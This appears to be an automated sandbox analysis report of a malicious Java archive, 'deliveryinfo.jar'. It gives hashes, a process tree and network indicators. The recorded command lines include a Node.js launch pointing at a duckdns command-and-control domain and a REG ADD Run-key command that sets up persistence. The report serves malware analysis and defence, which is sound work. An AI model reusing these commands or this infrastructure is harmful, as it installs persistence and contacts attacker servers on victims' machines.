download: | deliveryinfo.jar |
Full analysis: | https://app.any.run/tasks/54eefd28-e707-4a1f-b45d-9dee8f2f2f89 |
Verdict: | Malicious activity |
Analysis date: | September 30, 2020, 03:23:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/java-archive |
File info: | Java archive data (JAR) |
MD5: | 724141C6922AB8E19C262D269AA8AEE1 |
SHA1: | 0D2BF53FA5138AA22B1585F5C5093DFBE65DFCD0 |
SHA256: | A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D |
SSDEEP: | 12288:whSM3uQPBuy9mwsG+BXT4zsvuXEAr/qWy5khwG/:whSUuQpBxsG+NT4dXrriWGSH/ |
.jar | | | Java Archive (78.3) |
---|---|---|
.zip | | | ZIP compressed archive (21.6) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0808 |
ZipCompression: | Deflated |
ZipModifyDate: | 2020:09:25 16:24:26 |
ZipCRC: | 0x00000000 |
ZipCompressedSize: | 2 |
ZipUncompressedSize: | - |
ZipFileName: | META-INF/ |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2280 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\deliveryinfo.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | explorer.exe |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 0 Version: 8.0.920.14 | ||||
572 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar C:\Users\admin\AppData\Local\Temp\4e5716af.tmp | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | javaw.exe | |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 0 Version: 8.0.920.14 | ||||
3968 | C:\Users\admin\node-v14.12.0-win-x86\node.exe - --hub-domain hazeman222.duckdns.org | C:\Users\admin\node-v14.12.0-win-x86\node.exe | javaw.exe | |
User: admin Company: Node.js Integrity Level: MEDIUM Description: Node.js: Server-side JavaScript Exit code: 0 Version: 14.12.0 | ||||
1208 | C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org | C:\Users\admin\node-v14.12.0-win-x86\node.exe | — | node.exe |
User: admin Company: Node.js Integrity Level: MEDIUM Description: Node.js: Server-side JavaScript Version: 14.12.0 | ||||
2932 | C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org | C:\Users\admin\node-v14.12.0-win-x86\node.exe | node.exe | |
User: admin Company: Node.js Integrity Level: MEDIUM Description: Node.js: Server-side JavaScript Version: 14.12.0 | ||||
3996 | C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\""" | C:\Windows\system32\cmd.exe | — | node.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3420 | REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\"" | C:\Windows\system32\reg.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3420) reg.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run |
Operation: | write | Name: | e8529f2a-975c-451b-9760-2a0bb1500d9d |
Value: cmd /D /C "C:\Users\admin\qhub\node\2.0.10\boot.vbs" |
PID | Process | Filename | Type | |
---|---|---|---|---|
572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe | — | |
MD5:— | SHA256:— | |||
2280 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | |
MD5:A60F0E34D8C3555E66C3B82E3E190E95 | SHA256:56F928ACE68645241E155C043C89E011F0562C3AF92B00B56E392792B4C4ACE9 | |||
572 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | |
MD5:B5F695B7ED72F26866D96972FCCCFB88 | SHA256:C93AAE75B3445164FDDF214D051529A2A12914A4B3A4604CF73CEAF5ACBBC32B | |||
2280 | javaw.exe | C:\Users\admin\AppData\Local\Temp\4e5716af.tmp | java | |
MD5:724141C6922AB8E19C262D269AA8AEE1 | SHA256:A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D | |||
572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\bin\npm.cmd | text | |
MD5:D5B5ACB61C9BF69FB8BFC65EBA28C6AB | SHA256:AFA68B96334EA8493BCB908743AF3DBD619CF26BE7B44460179ABD4D75D849D2 | |||
572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\nodevars.bat | text | |
MD5:E6636C5B093F5CC13DFB7508305B8D8B | SHA256:A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5 | |||
572 | javaw.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\83aa4cc77f591dfc2374580bbd95f6ba_90059c37-1320-41a4-b58d-2b75a9850d2f | dbf | |
MD5:C8366AE350E7019AEFC9D1E6E6A498C6 | SHA256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238 | |||
572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\.mailmap | text | |
MD5:50FF5F4745B5210D1DDC6CB3AD21216B | SHA256:EC219650D5ED44D58B1F6CD6E8CCC116E118D7569E09ED19E9B80F5C8BE87D5B | |||
572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\CHANGELOG.md | html | |
MD5:5F15C768C60610B0F12C9BDE18D5EF36 | SHA256:5025CB1E5A255FB05B0E1263BE2AE9652EC95B0D380FCEBF88863E8BADF1B894 | |||
572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\LICENSE | text | |
MD5:A249503208BA72F4ABC790A08C1025C5 | SHA256:6C351F95A850B485A662E8B43003D8CA56CD663BE625981D7203A05D2CF587E0 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3968 | node.exe | 94.156.189.108:443 | hazeman222.duckdns.org | BelCloud Hosting Corporation | BG | unknown |
2932 | node.exe | 94.156.189.108:443 | hazeman222.duckdns.org | BelCloud Hosting Corporation | BG | unknown |
572 | javaw.exe | 104.20.22.46:443 | nodejs.org | Cloudflare Inc | US | shared |
2932 | node.exe | 95.217.228.176:443 | wtfismyip.com | Hetzner Online GmbH | DE | malicious |
Domain | IP | Reputation |
---|---|---|
nodejs.org |
| whitelisted |
hazeman222.duckdns.org |
| malicious |
wtfismyip.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |